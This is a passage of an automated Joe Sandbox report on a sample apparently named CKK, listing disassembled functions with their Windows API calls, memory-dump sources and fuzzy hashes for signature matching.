                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                          • String ID: %s%d
                                          • API String ID: 1272988791-1110647743
                                          • Opcode ID: 0362dba1f4b8b1a9b3cb285e1aba45691725f9f96183ab80433641450f238f0b
                                          • Instruction ID: 3f5fae523b1e91279ed15f94f7a4c323ba2716baba336ca6aa8155505a93597b
                                          • Opcode Fuzzy Hash: 0362dba1f4b8b1a9b3cb285e1aba45691725f9f96183ab80433641450f238f0b
                                          • Instruction Fuzzy Hash: D41196716002055BCF146F749C85EED77A9DF89308F145075FE09BF192DE70A949DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Menu$InfoItem$Draw
                                          • String ID: 0
                                          • API String ID: 3227129158-4108050209
                                          • Opcode ID: ff3bd736d27d7ffb4c68df0effbb586e0229bbbeaa44a708e62913ccf8ac02fc
                                          • Instruction ID: 23090bbff10462df08205ce6bd8e2b1b3b5a5d919dbbbc43f2b4952617e66e6e
                                          • Opcode Fuzzy Hash: ff3bd736d27d7ffb4c68df0effbb586e0229bbbeaa44a708e62913ccf8ac02fc
                                          • Instruction Fuzzy Hash: D7018432500218EFDB219F15EC45BEEBBB4FF45365F10909AE859E6251DB308A85DF21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E9D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AddressFreeLibraryProc
                                          • String ID: GetSystemWow64DirectoryW$X64
                                          • API String ID: 3013587201-2590602151
                                          • Opcode ID: 9e157bf6757c4d12f15d539337441f6450fde72d494182fb07f81a711bbc2adf
                                          • Instruction ID: ed3891ee947bb3beebe8b1a01335d152a57957255eaa80fff1ab9d240c1cbc1c
                                          • Opcode Fuzzy Hash: 9e157bf6757c4d12f15d539337441f6450fde72d494182fb07f81a711bbc2adf
                                          • Instruction Fuzzy Hash: 93F0E53180F632DBDF7597214C589E93324EF10742FA4BA6AE802F2155DB20CD49D693
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f428f921a1218c08ee32032ab0d1f6225ce3c1ba697fc11ee52809afe507f83
                                          • Instruction ID: f7fa707f98de5a2aebf3311749a10904e16ebfb768561d891c1b9dff9bef9686
                                          • Opcode Fuzzy Hash: 1f428f921a1218c08ee32032ab0d1f6225ce3c1ba697fc11ee52809afe507f83
                                          • Instruction Fuzzy Hash: 5EC13875A0020AAFDB14CFA8C894BAEB7B5FF49708F209598E505EF251D731EE45CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInitInitializeUninitialize
                                          • String ID:
                                          • API String ID: 1998397398-0
                                          • Opcode ID: be888827a63484088aba7ab07c652a3e347e22f6f0c0eca7abb89b09bdd3a132
                                          • Instruction ID: 7463e5888849321e6949a89b51e228dcbb0178211be015e02ba9c019b6389e5c
                                          • Opcode Fuzzy Hash: be888827a63484088aba7ab07c652a3e347e22f6f0c0eca7abb89b09bdd3a132
                                          • Instruction Fuzzy Hash: 5FA167756042109FC700DF28C585E6AB7E5FF88314F14985DF98AAB362DB35EE06CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID:
                                          • API String ID: 314563124-0
                                          • Opcode ID: 6ad60c8405859170d7bf2f032f6da8fe74f61b845d521b143eaf4201f03f6c09
                                          • Instruction ID: 607f98472032dfb2156f945ae8a67845d28fb4608194800e8a3f99aacd6fdc5f
                                          • Opcode Fuzzy Hash: 6ad60c8405859170d7bf2f032f6da8fe74f61b845d521b143eaf4201f03f6c09
                                          • Instruction Fuzzy Hash: 04812B75A00109EFCB04DF94C984EEEB7B9FF89315F205598E516BB250DB71AE06CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E81391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 7266333c40f15105fb034725e595635a2d70c0630767527cfb4c0d79d97762a9
                                          • Instruction ID: de2fa5699bfb5755bf77ee8ebc0ca8684a9e7ad43b59588ff4186fbffbd94090
                                          • Opcode Fuzzy Hash: 7266333c40f15105fb034725e595635a2d70c0630767527cfb4c0d79d97762a9
                                          • Instruction Fuzzy Hash: D0417D31A40100ABDB217BF9AC45ABE3BEDEF41370F1462A5F43DF21A2E67448435761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(01115280,?), ref: 00ED62E2
                                          • ScreenToClient.USER32(?,?), ref: 00ED6315
                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00ED6382
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID:
                                          • API String ID: 3880355969-0
                                          • Opcode ID: 382727c7f606b1008a10cc2e06a4488cd145ffd47ede7cd67c5dce5d8272cf01
                                          • Instruction ID: ed7ef3c5350704fc06c7ea2251643edd84dd879ed7332e0fd8dcc9c7024f4c13
                                          • Opcode Fuzzy Hash: 382727c7f606b1008a10cc2e06a4488cd145ffd47ede7cd67c5dce5d8272cf01
                                          • Instruction Fuzzy Hash: CA512D74900209AFDF10DF68D8809AE7BB5FF95364F10925AF925AB3A0D730ED42CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 582d45ad4665ed6982358232c169e71aa2043f081a02704233f3a2654b6e29b7
                                          • Instruction ID: d212b9d13aec51cd84143a55c4d9b9f749769f82c00eea0fec61e5c7740e6829
                                          • Opcode Fuzzy Hash: 582d45ad4665ed6982358232c169e71aa2043f081a02704233f3a2654b6e29b7
                                          • Instruction Fuzzy Hash: 1E411971A40304BFD724AF38CC41BAABBF9EB84710F10966EF559FB292E77199018780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EB5783
                                          • GetLastError.KERNEL32 ref: 00EB57A9
                                          • DeleteFileW.KERNEL32 ref: 00EB57CE
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EB57FA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          • Opcode ID: d8d6f4d8bf67a143e7af84ecebad089c2b239768744b9c3f4279e3ebe5fbe2e9
                                          • Instruction ID: 7156527d8f8483fffd3aa34361b6db0c9faddfe2220cd259f7797a312e4e388a
                                          • Opcode Fuzzy Hash: d8d6f4d8bf67a143e7af84ecebad089c2b239768744b9c3f4279e3ebe5fbe2e9
                                          • Instruction Fuzzy Hash: ED413D35600A11DFCB11DF15D544A5EBBE2EF89324B189899E84ABF362CB35FD00CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00E7D910
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E7D999
                                          • GetStringTypeW.KERNEL32 ref: 00E7D9AB
                                          • __freea.LIBCMT ref: 00E7D9B4
                                            • Part of subcall function 00E73820: RtlAllocateHeap.NTDLL(00000000,?,00F11444,?,00E5FDF5,?,?,00E4A976,00000010,00F11440,00E413FC,?,00E413C6,?,00E41129), ref: 00E73852
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                          • String ID:
                                          • API String ID: 2652629310-0
                                          • Opcode ID: 4ab87cb1ce22cc9815c6659eb1810d135b5c4db2824c9b8f52377f934d68c7a3
                                          • Instruction ID: 56004ef0c587fecd4889223df945accdaf90b145b656466b97644e3c1a3fe1a2
                                          • Opcode Fuzzy Hash: 4ab87cb1ce22cc9815c6659eb1810d135b5c4db2824c9b8f52377f934d68c7a3
                                          • Instruction Fuzzy Hash: 1131CE72A0021AABDB249F65DC41EAE7BB5EF80354B158268FD08E6290EB75CD54CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00EAABF1
                                          • SetKeyboardState.USER32(00000080), ref: 00EAAC0D
                                          • PostMessageW.USER32 ref: 00EAAC74
                                          • SendInput.USER32(00000001,?,0000001C), ref: 00EAACC6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: 1323fb4234f62e0304ee0faeba8131fe29241d5bb670ae705dba50671935e9bc
                                          • Instruction ID: e287bfbce0c2ed0d5928478b1d60e17c1517b2d8a23b6245b8a6ae21e6b5696b
                                          • Opcode Fuzzy Hash: 1323fb4234f62e0304ee0faeba8131fe29241d5bb670ae705dba50671935e9bc
                                          • Instruction Fuzzy Hash: 4C311A309007186FFF35CB6598047FAFBA5AB4E334F0C622AE4817A1D1C375A945C752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: 3d6e2265923eb9ddd7ff3d51c2789966ed10b708f9c961ccef6ba08834ae0aff
                                          • Instruction ID: e81973d2f1e9507e7b34afca13f96bdd1bd6d0e542645d7a52cfb8cd97e1db55
                                          • Opcode Fuzzy Hash: 3d6e2265923eb9ddd7ff3d51c2789966ed10b708f9c961ccef6ba08834ae0aff
                                          • Instruction Fuzzy Hash: D241BC34A092189FCB01CF58C884EA977F0FB48315F5594ABE9A4AB360E330E942CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00ED16EB
                                            • Part of subcall function 00EA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA3A57
                                            • Part of subcall function 00EA3A3D: GetCurrentThreadId.KERNEL32 ref: 00EA3A5E
                                            • Part of subcall function 00EA3A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00EA3A65
                                          • GetCaretPos.USER32(?), ref: 00ED16FF
                                          • ClientToScreen.USER32(00000000,?), ref: 00ED174C
                                          • GetForegroundWindow.USER32 ref: 00ED1752
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: 6479599717cdd6e7652347ad5002ac7c6c161caf00bd3813cdd4ee039debcf75
                                          • Instruction ID: e5be881473e7a8da7a368949b1abb3619993eab547a32e1b090482835c5ca21d
                                          • Opcode Fuzzy Hash: 6479599717cdd6e7652347ad5002ac7c6c161caf00bd3813cdd4ee039debcf75
                                          • Instruction Fuzzy Hash: BB316F75E01249AFC700EFAAD881CAEBBF9EF49304B5490AAE415F7211D731DE45CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00EAD501
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00EAD50F
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00EAD52F
                                          • CloseHandle.KERNEL32(00000000), ref: 00EAD5DC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 0fd0f7bc04876bfc20f26b67ee6fea63bafc67718f910b1d4d173cdd78353189
                                          • Instruction ID: c6315df6c394dce4720fb49039a8b2a2441ac3719c3031c99d2c177eb480c223
                                          • Opcode Fuzzy Hash: 0fd0f7bc04876bfc20f26b67ee6fea63bafc67718f910b1d4d173cdd78353189
                                          • Instruction Fuzzy Hash: 2331A4315083019FD304EF54EC81AAFBBF8EFD9354F14052DF582A61A2EB71A948CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                          • GetCursorPos.USER32(?), ref: 00ED9001
                                          • TrackPopupMenuEx.USER32 ref: 00ED9016
                                          • GetCursorPos.USER32(?), ref: 00ED905E
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E97711,?,?,?), ref: 00ED9094
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID:
                                          • API String ID: 2864067406-0
                                          • Opcode ID: a248a83aac3353cd1fb5ab84f60589c43b972494792f128f6b922658c084b367
                                          • Instruction ID: 3ed1458825d1c45a46395cb4f9a43aee0cdd0a93b4e0801ffb99ebc8d2ca23de
                                          • Opcode Fuzzy Hash: a248a83aac3353cd1fb5ab84f60589c43b972494792f128f6b922658c084b367
                                          • Instruction Fuzzy Hash: 6121D331600018EFDB259F94EC58EFA3BB9FF49350F148156F905AB2A2C3759991EB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                          • String ID:
                                          • API String ID: 2267087916-0
                                          • Opcode ID: ca7529efec5dd0261dfa50066d84bd69d1e7e49cb8db56b13543c2e1e2ea7c48
                                          • Instruction ID: 40d173e5158b41f47e16d46e50bc7579a6a149a65010d48e801b62e65f79e2b1
                                          • Opcode Fuzzy Hash: ca7529efec5dd0261dfa50066d84bd69d1e7e49cb8db56b13543c2e1e2ea7c48
                                          • Instruction Fuzzy Hash: 802194705097019F8700DF28D8814AE77E4EF5A358F205A1EF496EB2A1D730E94ACB93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA1014: GetTokenInformation.ADVAPI32 ref: 00EA102A
                                            • Part of subcall function 00EA1014: GetLastError.KERNEL32 ref: 00EA1036
                                            • Part of subcall function 00EA1014: GetProcessHeap.KERNEL32 ref: 00EA1045
                                            • Part of subcall function 00EA1014: HeapAlloc.KERNEL32(00000000,?,00000003,?,00000000,?), ref: 00EA104C
                                            • Part of subcall function 00EA1014: GetTokenInformation.ADVAPI32 ref: 00EA1062
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00EA15BE
                                          • _memcmp.LIBVCRUNTIME ref: 00EA15E1
                                          • GetProcessHeap.KERNEL32 ref: 00EA1617
                                          • HeapFree.KERNEL32(00000000), ref: 00EA161E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
